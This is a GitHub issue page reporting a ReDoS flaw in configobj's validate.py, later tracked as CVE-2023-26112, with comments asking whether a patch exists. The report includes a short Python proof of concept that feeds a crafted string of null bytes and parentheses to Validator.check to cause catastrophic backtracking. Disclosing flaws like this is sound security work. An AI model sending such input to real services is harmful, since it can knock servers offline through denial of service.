Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

A ReDoS vulnerability exists in ./src/configobj/validate.py #232

Open
DarkTinia opened this issue Jan 27, 2023 · 5 comments
Open

A ReDoS vulnerability exists in ./src/configobj/validate.py #232

DarkTinia opened this issue Jan 27, 2023 · 5 comments

Comments

@DarkTinia
Copy link

The affected code is located in validate.py-line660. It uses the vulnerable regular expression (.+?)\((.*)\). When the match fails, it will cause catastrophic backtracking.
I trigger the vulnerability using the python script below

from configobj.validate import Validator
value = "aaa"
i = 10
attack = '\x00'*16510*i + ')' + '('*16510*i
vtor = Validator()
newval1 = vtor.check(attack, value)

I see many projects referencing this file, when run server side there has possible DOS. It is my pleasure to provide a patch to repair the ReDoS vulnerability.

@robdennis
Copy link
Member

Opening a pull request that patches this vulnerability would be appreciated. Thank you.

@yewhen
Copy link

yewhen commented Apr 4, 2023

Is this security hole fixed?

@carnil
Copy link

carnil commented Apr 6, 2023

CVE-2023-26112 appears to have been assigned for this issue.

@swf504
Copy link

swf504 commented Apr 23, 2023

just ping, if any PR fixed this CVE?

@robdennis
Copy link
Member

robdennis commented Apr 23, 2023 via email

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

5 participants